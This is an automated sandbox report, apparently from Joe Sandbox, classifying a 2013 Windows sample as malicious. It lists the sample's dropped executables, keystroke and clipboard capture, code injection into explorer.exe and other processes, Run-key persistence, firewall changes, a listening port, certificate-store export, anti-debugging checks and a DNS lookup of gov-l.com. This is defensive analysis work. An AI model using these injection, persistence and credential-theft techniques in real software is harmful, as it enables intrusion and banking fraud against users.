Joe Sandbox Desktop - Analysis Report 36150

General Information

Analysis ID:	36150
Start time:	11:34:16
Start date:	23/09/2013
Overall analysis duration:	0h 3m 32s
Report type:	full
Sample file name:	9f68ae8267182bf1be4e5bb6c75022b8
Cookbook file name:	default.jbs
Analysis system description:	XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	3
HCA enabled:	true
HCA success:	true, ratio: 95%
Warnings:	Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Detection	Index	Report FP/FN
Threshold	malicious	0.220

Signature Overview

Key, Mouse, Clipboard, Microphone and Screen Caputering:

Contains functionality to retrieve information about pressed keystrokes		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FCDFE6 EnterCriticalSection,GetTickCount,GetCurrentProcessId,LeaveCriticalSection,GetKeyboardState,ToUnicode,	2_2_00FCDFE6
Hooks clipboard functions (used to sniff clipboard data)		Show sources
Source: explorer.exe	IAT, EAT or inline hook detected: module: USER32.dll function: GetClipboardData

E-Banking Fraud:

Hooks winsocket function (used for sniffing or altering network traffic)			Show sources
Source: explorer.exe	File created: function: WSARecv

Networking:

Contains functionality to download additional files from the internet		Show sources
Source: C:\9f68ae8267182bf1be4e5bb6c75022b8.exe	Code function: 0_2_00871019 ExitProcess,HeapCreate,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetTempPathW,wsprintfW,CreateFileW,GetFileSize,lstrlenW,lstrlenW,HeapAlloc,ReadFile,lstrcmpW,lstrlenW,CreateFileW,lstrlenW,WriteFile,CloseHandle,CloseHandle,CloseHandle,GetTempPathW,ShellExecuteW,CloseHandle,DeleteFileW,InternetOpenW,InternetConnectW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,HttpOpenRequestW,Sleep,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,HttpQueryInfoW,HeapAlloc,InternetReadFile,CreateFileW,WriteFile,CloseHandle,GetCurrentDirectoryW,wsprintfW,	0_2_00871019
Downloads files		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe	File created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\5B7NHQO2\da[1].exe
Urls found in memory or binary data		Show sources
Source: 56C1FDF96B4236A573C8DF6802435A5D.dr	String found in binary or memory: http://crl.comodoca.com/positivesslca2.crl
Source: Tar6.tmp.dr	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/miccerlisca2011_2011-03-29.crl0
Source: Tar6.tmp.dr	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/miccertrulispca_2009-04-02.crl0
Source: Tar6.tmp.dr	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/microoceraut_2010-06-23.crl0z
Source: Tar6.tmp.dr	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0t
Source: 3B6E683A7A45CC59BF035C9BA8C7AB9D.dr	String found in binary or memory: http://crl.usertrust.com/addtrustexternalcaroot.crl
Source: Tar6.tmp.dr	String found in binary or memory: http://support.microsoft.com/kb/9311250
Source: bfsrfgs.exe	String found in binary or memory: http://www.bing.com/
Source: 2BF68F4714092295550497DD56F57004.dr	String found in binary or memory: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt
Source: 94308059B57B3142E455B38A6EB92015.dr	String found in binary or memory: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: bfsrfgs.exe	String found in binary or memory: http://www.google.com/
Source: Tar6.tmp.dr	String found in binary or memory: http://www.microsoft.com/pki/certs/miccerlisca2011_2011-03-29.crt0
Source: Tar6.tmp.dr	String found in binary or memory: http://www.microsoft.com/pki/certs/miccertrulispca_2009-04-02.crt0
Source: Tar6.tmp.dr	String found in binary or memory: http://www.microsoft.com/pki/certs/microoceraut_2010-06-23.crt07
Source: Tar6.tmp.dr	String found in binary or memory: http://www.microsoft.com/pki/certs/microsoftrootcert.crt0
Source: Tar6.tmp.dr	String found in binary or memory: http://www.microsoft.com/pki/crl/products/miccertrulispca_2009-04-02.crl
Downloads files from webservers via HTTP		Show sources
Source: global traffic	HTTP traffic detected: GET /AddTrustExternalCARoot.crl HTTP/1.1 Accept: / User-Agent: Microsoft-CryptoAPI/5.131.2600.5512 Host: crl.usertrust.com Connection: Keep-Alive Cache-Control: no-cache Pragma: no-cache
Performs DNS lookups		Show sources
Source: unknown	DNS traffic detected: queries for: gov-l.com

Boot Survival:

Creates an autostart registry key		Show sources
Source: C:\WINDOWS\explorer.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run Yxufa
Creates or modifies windows services		Show sources
Source: C:\WINDOWS\explorer.exe	Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
Modifies existing windows services		Show sources
Source: C:\WINDOWS\explorer.exe	Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
Monitors registry run keys for changes		Show sources
Source: C:\WINDOWS\system32\ctfmon.exe	Registry key monitored: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run

Remote Access Functionality:

Opens a port and listens for incoming connection (possibly a backdoor)			Show sources
Source: C:\WINDOWS\explorer.exe	Socket bind: port: 7052

Persistence and Installation Behavior:

Drops PE files		Show sources
Source: C:\9f68ae8267182bf1be4e5bb6c75022b8.exe	File created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	File created: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe	File created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe	File created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\5B7NHQO2\da[1].exe

Data Obfuscation:

Binary may include packed or encrypted data		Show sources
Source: initial sample	Static PE information: code, entropy: 6.606766283084279
Contains functionality to dynamically determine API calls		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_0351F2F7 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,	2_2_0351F2F7
PE file contains an invalid checksum		Show sources
Source: initial sample	Static PE information: real checksum: 0x0 should be: 0xf2f8

Spreading:

Contains functionality to enumerate / list files inside a directory			Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FE3C8C FindFirstFileW,FindNextFileW,GetLastError,FindClose,SetLastError,		2_2_00FE3C8C

System Summary:

Contains functionality to access the windows certificate store		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FD24AA CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,CertCloseStore,	2_2_00FD24AA
Contains functionality to adjust token privileges (e.g. debug / backup)		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FD50C0 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,	2_2_00FD50C0
Contains functionality to enum processes or threads		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FF4181 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,GetLengthSid,memcmp,CloseHandle,Process32NextW,CloseHandle,	2_2_00FF4181
Creates files inside the user directory		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe	File created: C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\3B6E683A7A45CC59BF035C9BA8C7AB9D
Creates temporary files		Show sources
Source: C:\9f68ae8267182bf1be4e5bb6c75022b8.exe	File created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe
Executes batch files		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Process created: C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SMNBD85.bat
Reads ini files		Show sources
Source: C:\9f68ae8267182bf1be4e5bb6c75022b8.exe	File read: C:\Documents and Settings\Administrator\My Documents\desktop.ini
Spawns processes		Show sources
Source: C:\9f68ae8267182bf1be4e5bb6c75022b8.exe	Process created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe
Contains functionality to call native functions		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FDD904 NtQueryInformationProcess,CloseHandle,	2_2_00FDD904
Contains functionality to shutdown / reboot the system		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FE5087 CreateMutexW,GetLastError,CloseHandle,lstrlenW,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,IsWellKnownSid,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	2_2_00FE5087
Creates mutexes		Show sources
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-455C-B06D5417937F}
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Mutant created: \BaseNamedObjects\Global\{64307AAF-C4D3-D5D5-FB56-FD56EA1DDE44}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-215D-B06D3016937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44}
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-455B-B06D5410937F}
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-515D-B06D4016937F}
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-295B-B06D3810937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-815F-B06D9014937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{41836DC6-D3BA-F066-FB56-FD56EA1DDE44}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-5958-B06D4813937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{9B698CC0-32BC-2A8C-FB56-FD56EA1DDE44}
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Mutant created: \BaseNamedObjects\Local\{DB295FE4-E198-6ACC-FB56-FD56EA1DDE44}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-C95D-B06DD816937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-655C-B06D7417937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-655E-B06D7415937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-5D5B-B06D4C10937F}
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-E15B-B06DF010937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-B55E-B06DA415937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-515C-B06D4017937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-3559-B06D2412937F}
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-4D5B-B06D5C10937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-1959-B06D0812937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{9B698CC7-32BB-2A8C-FB56-FD56EA1DDE44}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-155C-B06D0417937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-C15E-B06DD015937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-D15B-B06DC010937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-295F-B06D3814937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{97855BF5-E589-2660-FB56-FD56EA1DDE44}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-BD5F-B06DAC14937F}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Global\{C3462226-9C5A-72A3-0D5F-B06D1C14937F}
Source: C:\WINDOWS\system32\cmd.exe	Mutant created: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}
Source: C:\WINDOWS\explorer.exe	Mutant created: \BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44}
Enables driver privileges		Show sources
Source: C:\9f68ae8267182bf1be4e5bb6c75022b8.exe	Process token adjusted: Load Driver
Tries to load missing DLLs		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe	Section loaded: xpsp2res.dll

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to add an ACL to a security descriptor		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FF358E InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,	2_2_00FF358E
Contains functionality to inject threads in other processes		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FF40AB CreateRemoteThread,	2_2_00FF40AB
Allocates memory in foreign processes		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Memory allocated: C:\WINDOWS\system32\cmd.exe base: 140000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: C:\WINDOWS\explorer.exe base: 2800000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: C:\WINDOWS\explorer.exe base: 2890000 protect: page read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: C:\WINDOWS\explorer.exe base: 298E000 protect: page read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: C:\WINDOWS\system32\ctfmon.exe base: CC0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: C:\WINDOWS\system32\ctfmon.exe base: D10000 protect: page read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: C:\WINDOWS\system32\ctfmon.exe base: E0E000 protect: page read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: C:\WINDOWS\system32\wscntfy.exe base: AE0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: C:\WINDOWS\system32\wscntfy.exe base: B30000 protect: page read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: C:\WINDOWS\system32\wscntfy.exe base: C2E000 protect: page read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: unknown base: FC0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: unknown base: 1010000 protect: page read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory allocated: unknown base: 110E000 protect: page read and write
Changes memory attributes in foreign processes to executable or writable		Show sources
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\explorer.exe base: 2800000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\explorer.exe base: 2842958 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\explorer.exe base: 2842000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\explorer.exe base: 284296C protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\explorer.exe base: 2842FC8 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\explorer.exe base: 2842FCC protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\explorer.exe base: 298E000 protect: page read and write and page guard
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\ctfmon.exe base: CC0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\ctfmon.exe base: D02958 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\ctfmon.exe base: D02000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\ctfmon.exe base: D0296C protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\ctfmon.exe base: D02FC8 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\ctfmon.exe base: D02FCC protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\ctfmon.exe base: E0E000 protect: page read and write and page guard
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\wscntfy.exe base: AE0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\wscntfy.exe base: B22958 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\wscntfy.exe base: B22000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\wscntfy.exe base: B2296C protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\wscntfy.exe base: B22FC8 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\wscntfy.exe base: B22FCC protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: C:\WINDOWS\system32\wscntfy.exe base: C2E000 protect: page read and write and page guard
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: unknown base: FC0000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: unknown base: 1002958 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: unknown base: 1002000 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: unknown base: 100296C protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: unknown base: 1002FC8 protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: unknown base: 1002FCC protect: page execute and read and write
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory protected: unknown base: 110E000 protect: page read and write and page guard
Creates a thread in another existing process (thread injection)		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Threat created: C:\WINDOWS\system32\cmd.exe EIP: 7C810705
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Threat created: C:\WINDOWS\explorer.exe EIP: 7C8106F9
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Threat created: C:\WINDOWS\system32\ctfmon.exe EIP: 7C8106F9
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Threat created: C:\WINDOWS\system32\wscntfy.exe EIP: 7C8106F9
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Threat created: unknown EIP: 7C8106F9
Injects a PE file into a foreign processes		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Memory written: C:\WINDOWS\system32\cmd.exe base: 140000 value starts with: 4D5A
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\explorer.exe base: 2800000 value starts with: 4D5A
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\ctfmon.exe base: CC0000 value starts with: 4D5A
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\wscntfy.exe base: AE0000 value starts with: 4D5A
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: unknown base: FC0000 value starts with: 4D5A
Writes to foreign memory regions		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Memory written: C:\WINDOWS\system32\cmd.exe base: 140000
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Memory written: C:\WINDOWS\system32\cmd.exe base: 182958
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Memory written: C:\WINDOWS\system32\cmd.exe base: 18296C
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Memory written: C:\WINDOWS\system32\cmd.exe base: 182FC8
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Memory written: C:\WINDOWS\system32\cmd.exe base: 182FCC
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\explorer.exe base: 2800000
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\explorer.exe base: 2842958
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\explorer.exe base: 284296C
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\explorer.exe base: 2842FC8
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\explorer.exe base: 2842FCC
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\ctfmon.exe base: CC0000
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\ctfmon.exe base: D02958
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\ctfmon.exe base: D0296C
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\ctfmon.exe base: D02FC8
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\ctfmon.exe base: D02FCC
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\wscntfy.exe base: AE0000
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\wscntfy.exe base: B22958
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\wscntfy.exe base: B2296C
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\wscntfy.exe base: B22FC8
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: C:\WINDOWS\system32\wscntfy.exe base: B22FCC
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: unknown base: FC0000
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: unknown base: 1002958
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: unknown base: 100296C
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: unknown base: 1002FC8
Source: C:\Documents and Settings\Administrator\Application Data\Uvar\yxufa.exe	Memory written: unknown base: 1002FCC

Anti Debugging:

Contains functionality to register its own exception handler		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_0351F662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0351F662
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe	System information queried: KernelDebuggerInformation
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FDDBC4 LdrGetDllHandle,	2_2_00FDDBC4
Contains functionality to check if a debugger is running (IsDebuggerPresent)		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_0351F662 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0351F662
Contains functionality to dynamically determine API calls		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_0351F2F7 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,	2_2_0351F2F7
Creates guard pages, often used to prevent reverse engineering and debugging		Show sources
Source: C:\9f68ae8267182bf1be4e5bb6c75022b8.exe	Memory protected: page read and write and page guard
Found dropped PE file which has not been started or loaded		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe	Dropped PE file which has not been started: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\5B7NHQO2\da[1].exe

Virtual Machine Detection:

Contains functionality to enumerate / list files inside a directory		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Code function: 2_2_00FE3C8C FindFirstFileW,FindNextFileW,GetLastError,FindClose,SetLastError,	2_2_00FE3C8C
Queries a list of all running processes		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bfsrfgs.exe	Process information queried: ProcessInformation

Hooking and other Techniques for Stealthness and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)		Show sources
Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dfengh.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Deletes itself after installation		Show sources
